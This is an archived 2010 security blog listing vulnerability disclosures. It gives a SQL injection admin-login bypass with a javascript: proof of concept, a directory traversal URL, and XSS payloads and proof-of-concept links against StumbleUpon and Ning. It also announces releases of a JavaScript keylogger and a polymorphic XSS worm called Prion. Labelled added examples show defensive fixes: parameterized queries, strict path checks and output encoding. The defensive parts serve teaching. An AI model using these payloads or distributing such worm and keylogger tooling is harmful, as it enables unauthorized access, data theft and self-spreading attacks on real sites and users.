This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, April 28, 2010

Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server 0.9 doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field of the login form. As the username field has a client-side length constraint, I packaged the exploit in some JavaScript that writes the payload into the field and submits the form directly; a client-side length limit only restricts what is typed into the field, not what a script assigns to it.

Exploit (the leading single quote closes the open username string literal, and the UNION supplies a fabricated user row whose Password column is empty): ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC (run from the address bar on the login page; it sets the first field of the first form to the payload and submits the form): javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
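To show what the UNION payload does to a concatenated login query, here is an added example; it is not the product's code, and the server's real query and table layout are not on the page. It assumes a hypothetical login that fetches the user row by username through string concatenation and then compares the Password column in application code, a Users table with a RecID, Username, Password and AccessLevel column plus enough filler columns to match the width of the UNION SELECT, and one constructed user row.

```python
import sqlite3

# The payload from the post, including the leading quote that closes the
# username literal.
PAYLOAD = "' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--"

# Width of the UNION SELECT in the payload (number of comma-separated values).
N_COLS = PAYLOAD.count(",") + 1

# Hypothetical schema (an assumption): four named columns plus filler so that
# SELECT * has exactly as many columns as the UNION SELECT in the payload.
COLUMNS = ["RecID", "Username", "Password", "AccessLevel"] + [
    f"Field{i}" for i in range(5, N_COLS + 1)
]


def make_db():
    """In-memory database with one constructed user (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE Users ({', '.join(COLUMNS)})")
    row = [1, "admin", "s3cret", 2] + [0] * (N_COLS - 4)
    placeholders = ",".join("?" * N_COLS)
    conn.execute(f"INSERT INTO Users VALUES ({placeholders})", row)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by concatenation, so the username is never escaped."""
    sql = f"SELECT * FROM Users WHERE Username = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    user = dict(zip(COLUMNS, row))
    # The password check runs against whatever row the query produced. With the
    # payload, the first SELECT matches nothing (1=0) and the UNION row carries
    # Password = '', so an empty submitted password "matches" and the caller
    # gets a row with AccessLevel 2.
    return user if user["Password"] == password else None


def login_fixed(conn, username, password):
    """Same logic with a bound parameter: the payload is just an odd username."""
    sql = "SELECT * FROM Users WHERE Username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    if row is None:
        return None
    user = dict(zip(COLUMNS, row))
    return user if user["Password"] == password else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, ""))
    print("fixed:     ", login_fixed(db, PAYLOAD, ""))
```

The fabricated row is the whole point of the UNION: the application never sees the real admin record, it sees a row the attacker typed, including the empty password and the privilege value in the fourth column.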

Tuesday, April 27, 2010

OneHTTPD 0.6 Directory Traversal

It's possible to navigate the local file system of a server running OneHTTPD 0.6 with a specially crafted URL. Each ../ segment is prefixed with %C2, a byte that begins a two-byte UTF-8 sequence but is not followed by a valid continuation byte here; the server accepts the resulting segments and still walks up the directory tree.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../
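The check a file-serving handler should apply to a request path, as an added example that is not OneHTTPD's code: percent-decode to bytes, decode those bytes as strict UTF-8 (which rejects %C2 followed by a dot, because 0x2E is not a UTF-8 continuation byte), refuse any ".." segment after decoding, and confirm the normalised result still lies under the document root. The document root and the sample request paths are made up.

```python
import posixpath
from urllib.parse import unquote_to_bytes

DOCROOT = "/var/www/html"  # hypothetical document root


def resolve_request_path(url_path, docroot=DOCROOT):
    """Map a request path to a file under docroot.

    Returns the resolved absolute path, or None if the request is rejected.
    """
    # 1. Drop any query string, then percent-decode to raw bytes. The result
    #    is not necessarily valid UTF-8, which is exactly the %C2 case.
    raw = unquote_to_bytes(url_path.split("?", 1)[0])

    # 2. Decode strictly. b'\xc2' must be followed by a byte in 0x80-0xBF;
    #    b'\xc2.' raises UnicodeDecodeError instead of being silently dropped.
    try:
        path = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None

    # 3. Reject NUL bytes and backslashes outright (backslash is a path
    #    separator on Windows, where this server was used).
    if "\x00" in path or "\\" in path:
        return None

    # 4. Split into segments only after decoding, so an encoded or otherwise
    #    disguised ".." has already been turned into the literal string.
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None

    # 5. Belt and braces: normalise and verify the result is inside docroot.
    full = posixpath.normpath(posixpath.join(docroot, *segments))
    if posixpath.commonpath([docroot, full]) != docroot:
        return None
    return full


if __name__ == "__main__":
    # Constructed sample requests, including the URL from the post.
    for p in ("/index.html",
              "/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../",
              "/../../etc/passwd",
              "/%2e%2e/%2e%2e/etc/passwd"):
        print(p, "->", resolve_request_path(p))
```

Ordering is the important part: the traversal check has to run on the fully decoded string, and any bytes that do not decode cleanly are a reason to refuse the request rather than something to skip over.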

Monday, April 26, 2010

Stumbleupon.com Reflected XSS

The code that displays spelling corrections echoes the submitted search query into the page without encoding it.

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

Ning.com Persistent XSS

Less-than and greater-than characters submitted in the descriptions of albums, images and probably other fields are not encoded on output. Tags submitted in such fields are subject to whitelist validation, but the validation can be bypassed by prepending an extra less-than character to the injected opening and closing tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1
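One added example serves both the StumbleUpon and the Ning posts above; it is not either site's code. The allow-list validator below is a toy written to reproduce the bypass the Ning post describes (anything between angle brackets that does not start with a tag name is treated as plain text and skipped), which is an assumption about how such a filter fails, not Ning's actual implementation. The stdlib HTML parser then shows what a browser-style tokenizer makes of the same string: a less-than sign that is not followed by a letter is literal text, so the second bracket of <<script> opens a real tag. The fix for both the reflected and the stored case is the same, encode at the output point; the page templates here are made up.

```python
import html
import re
from html.parser import HTMLParser

REFLECTED = "teh<script>alert(0)</script>"    # query string from the StumbleUpon post
PERSISTENT = "<<script>alert(0)//<</script>"  # description payload from the Ning post

ALLOWED_TAGS = {"b", "i", "a", "p"}  # hypothetical allow-list

_BRACKETED = re.compile(r"<([^>]*)>")                 # '<' up to the next '>'
_TAG_NAME = re.compile(r"^/?([A-Za-z][A-Za-z0-9]*)")  # optional '/', then a name


def naive_validate(text):
    """Toy allow-list validator (assumption, not Ning's code).

    Every '<...>' run is examined; a run that does not begin with a tag name
    is treated as ordinary text and skipped. '<<script>' yields the run
    '<script', which starts with '<' rather than a letter, so it is skipped
    and the submission is accepted.
    """
    for inner in _BRACKETED.findall(text):
        m = _TAG_NAME.match(inner.strip())
        if m is None:
            continue
        if m.group(1).lower() not in ALLOWED_TAGS:
            return False
    return True


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_seen_by_parser(markup):
    """Start tags an HTML parser actually finds in the markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def render_search_page(query):
    """Reflected case: the query is HTML-encoded at the output point."""
    return f"<p>Showing results for {html.escape(query, quote=True)}</p>"


def render_description(description):
    """Stored case: encoding on output makes the allow-list bypass moot,
    because no '<' from user data can open a tag."""
    return f'<div class="description">{html.escape(description, quote=True)}</div>'


if __name__ == "__main__":
    print("validator accepts payload:", naive_validate(PERSISTENT))
    print("parser sees tags:", tags_seen_by_parser(PERSISTENT))
    print("encoded, parser sees tags:", tags_seen_by_parser(render_description(PERSISTENT)))
```

Allow-list filtering of markup is hard to get right precisely because the filter and the browser tokenize differently; output encoding sidesteps the comparison entirely, and any field that must carry real markup needs a proper HTML sanitizer rather than a regex.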

Sunday, April 25, 2010

Javascript Keylogger 1.4 Released

A Python HTTP server has been added for greater cross-platform compatibility.

Download 1

Download 2

Sunday, April 11, 2010

Prion 1.3 Released - Polymorphic XSS Worm

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled-down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site JavaScript file, one more artifact for anyone who might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Monday, April 5, 2010

Prion 1.2 Released - Polymorphic XSS Worm

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download